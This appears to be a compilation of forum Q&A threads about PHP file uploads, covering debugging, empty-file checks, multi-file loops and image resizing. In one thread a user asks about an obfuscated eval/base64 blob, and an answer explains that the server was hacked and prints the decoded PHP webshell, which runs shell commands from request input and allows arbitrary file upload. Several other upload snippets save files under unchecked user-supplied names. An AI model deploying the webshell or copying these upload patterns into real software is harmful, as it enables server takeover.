<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_POST)
{
if(count($_FILES)>=0)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
}
?>
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>
I want to upload some files. Probably the simplest idea but it doesn't work and I don't know why. Any suggestions why when I press Upload the file just disappears?
You problem is that you're checking the $_POST superglobal when you should in fact check only $_FILES superglobal:
<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_FILES)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>
Related
I'm very new to coding.
I'm trying to upload an image (any file for now) in a particular folder.
<?php
$name = $_FILES["file"]["name"];
$tmpName = $_FILES["file"]["tmp_name"];
if(isset($name)){
if(!empty($name)){
$location = "uploads/";
$destination_path = getcwd().DIRECTORY_SEPARATOR;
if (move_uploaded_file($tmpName,$destination_path.$location.$name)) {
echo "uploaded!";
}
else {
echo "boo";
}
}
else {
echo "please choose a file";
}
}
?>
<html>
<body>
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<br>
<br>
<input type="submit" value="SUBMIT">
</form>
</body>
</html>
Everything is getting executed properly until the "move_uploaded_file" if-condition. Getting the else-echo-statement("boo")
This is my file uploader:
<form action="done.php" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<button type="submit" value="upload">Upload</button>
</form>
This is what happens now:
If I do not select any file and I click on "submit", I will be redirected to the done.php.
What I need:
If there is no file selected and I click on submit, I want to stay on my site and get an error messagage "No file selected".
done.php:
if(isset($_FILES['file'])) {
$file = $_FILES['file'];
$target_file = 'files/'.basename($_FILES["file"]["name"]);
$filename = $target_file;
if (file_exists($target_file)) {
echo "file already existes";
}
else {
move_uploaded_file($_FILES["file"]["tmp_name"], $target_file);
}
}
I updated my code now like Florian suggested:
done.php:
if(isset($_FILES['file'])) {
$file = $_FILES['file'];
$target_file = 'files/'.basename($_FILES["file"]["name"]);
$filename = $target_file;
if (file_exists($target_file)) {
echo "file already existes";
}
else {
move_uploaded_file($_FILES["file"]["tmp_name"], $target_file);
}
}
else {
echo 'No file selected. Back to upload form';
}
What happens now is, when I do not select any file I get the error message: "file already exists". I do not understand why.
Extend your done.php as follow:
if(!file_exists($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
$file = $_FILES['file'];
$target_file = 'files/'.basename($_FILES["file"]["name"]);
$filename = $target_file;
move_uploaded_file($_FILES["file"]["tmp_name"], $target_file);
} else {
echo 'No file selected. Back to upload form';
// maybe you want to include the upload form here or do something else
}
<html>
<body>
<script>
function unlock(){
document.getElementById('buttonSubmit').removeAttribute("disabled");
}
</script>
<form action="done.php" method="post" enctype="multipart/form-data">
<input type="file" onchange="unlock();" name="file">
<button type="submit" id="buttonSubmit" value="upload" disabled>Upload</button>
</form>
</body>
</html>
Depending on your "View-Code" it could be something like that
<form action="done.php" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="todo" value="fileupload"?>
<button type="submit" value="upload">Upload</button>
</form>
<?php if($_POST && !$_FILES):?>
<h3>"No file selected".</h3>
<?php endif;?>
<html>
<head>
<style>
li
{
display: inline-block;
}
</style>
<script>
function formValidation()
{
if(document.getElementById("fileName").value==""||document.getElementById("fileName").value==null)
{
alert("no file selected");
return false;
}
else
return true;
}
</script>
</head>
<body>
<form action="done.php" method="post" enctype="multipart/form-data" onSubmit="return formValidation()">
<input id="fileName" type="file" name="file">
<button type="submit" value="upload">Upload</button>
</form>
</body>
</html>
You can check it with
if(strlen($_FILES[$mcFile]['name'])==0){
echo "Error No file selected ";
}
OR
if ($_FILES["file"]["error"] > 0){
echo "Error No file selected ";
}
These both are the way to check files validation at server end
Could someone explain me what is the effect of this snippet :
eval(gzinflate(str_rot13(base64_decode('DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1+e/L0WSNzzHza5rSI+8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ+FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc/HRO9oVHY9iTSnq58/F+HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD+oiOz7MetE3w/litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X+Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P+svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU/B2XAXsnqPgJjIheHq8REYvu+L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4/ufX37evz/8='))));
Your server has been hacked. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server for recovery tips. This code allows an attacker to upload any file they want to your server. It decodes to:
<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
$file = $_FILES["myFile"]["tmp_name"];
$name = $_FILES["myFile"]["name"];
if (!move_uploaded_file($file, $name)) {
echo "Unable to upload file";
} else {
echo "File Uploaded...";
}
}
}
if (!empty($_GET["x"])) {
echo "<pre>";
system($_GET["x"]);
echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
exit;
}
?>
I found a nice tutorial on YouTube by Anthoniraj Amalanathan. On the video tutorial, it works fine for hem but when I try to replicate it, I get an error. Here is the code:
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true)
{
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++)
{
$name=$files['name'][$x];
$tmp_name = $file['tmp_name'][$x];
move_uploaded_file($files,'test/'.$name);
echo 'Upload OK';
}
}
?>
The message states that the error is on line 12 ($tmp_name = $file['tmp_name'][$x];) but I don't seem to figure out why.
Can some one help here?
Try this, I tested it and it works for me.
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true) {
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++) {
$name = $files['name'][$x];
$tmp_name = $file['tmp_name'][$x];
move_uploaded_file($files['tmp_name'][$x],'test/'.$name);
echo 'Upload OK';
}
}
?>
The error I got came from using an array as the temp. file location. By changing it to $files['tmp_name'][$x], it worked.
Old: move_uploaded_file($files,'test/'.$name);
New: move_uploaded_file($files['tmp_name'][$x],'test/'.$name);
Its just a typo. $file is never declared, it should be $files.
Here:
$tmp_name = $file['tmp_name'][$x];
// ^ missing s
Also here:
move_uploaded_file($files,'test/'.$name);
// ^^^^^^ shouldn't this be $tmp_name?
Try like this :
<?php
if(is_uploaded_file($_FILES['upload']['tmp_name'])){
foreach($_FILES['upload']['name'] as $x=>$name) {
$name = basename($_FILES['upload']['name'][$x});
$folder = 'test/';
$full_path = $folder.$name ;
if(move_uploaded_file($_FILES['upload']['tmp_name'][$x], $full_path)) {
echo 'Upload OK';
} else {
echo 'Upload Failed';
}
}
}else{
echo 'Upload Not Received';
}
?>
i have a code for re-sizing image in php... it works well in local machine and splitting correctly...images are visible in all 4 sizes... but,when am using this in server...image size is re-sized...original image is visible...resized image is not visible...comes with black color...what is the solution for it...here is the code i used...
main.php
<?php
if(isset($_POST['submit']))
{
$uploaddir = 'uploads/';
$file = basename($_FILES['uploadedfile']['name']);
$uploadfile = $uploaddir . $file;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $uploadfile);
include ("thumb.php");
$target=$_FILES['uploadedfile']['name'];
$new='uploads/'."thumb_".$target;
$type=$_FILES['uploadedfile']['type'];
$w=90;
$h=90;
resize($target,$new,$w,$h,$type);
include ("medium.php");
$new1='uploads/'."middle_".$target;
$type1=$_FILES['uploadedfile']['type'];
$w1=400;
$h1=400;
resizee($target,$new1,$w1,$h1,$type1);
include ("big.php");
$new2='uploads/'."big_".$target;
$type2=$_FILES['uploadedfile']['type'];
$w2=900;
$h2=900;
resizeee($target,$new2,$w2,$h2,$type2);
echo "thumb_".$target."<br>";
echo "middle_".$target."<br>";
echo "big_".$target."<br>";
}
?>
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="uploadedfile">
<input type="submit" name="submit">
</form>
</body>
</html>
thumb.php
<?php
function resize($target,$new,$w,$h,$type)
{
echo $target;
list($wo,$ho)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m=imagecreatefrompng('uploads/'.$target);
}
$change=imagecreatetruecolor($w,$h);
imagecopyresampled($change,$m,0,0,0,0,$w,$h,$wo,$ho);
imagejpeg($change,$new,90);
}
?>
medium.php
<?php
function resizee($target,$new1,$w1,$h1,$type)
{
list($wo1,$ho1)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m1=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m1=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m1=imagecreatefrompng('uploads/'.$target);
}
$change1=imagecreatetruecolor($w1,$h1);
imagecopyresampled($change1,$m1,0,0,0,0,$w1,$h1,$wo1,$ho1);
imagejpeg($change1,$new1,500);
}
?>
big.php
<?php
function resizeee($target,$new2,$w2,$h2,$type)
{
list($wo2,$ho2)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m2=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m2=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m2=imagecreatefrompng('uploads/'.$target);
}
$change2=imagecreatetruecolor($w2,$h2);
imagecopyresampled($change2,$m2,0,0,0,0,$w2,$h2,$wo2,$ho2);
imagejpeg($change2,$new2,900);
}
?>
You may want to check the permissions on the file / directory to make sure that they are readable and writable by your PHP script.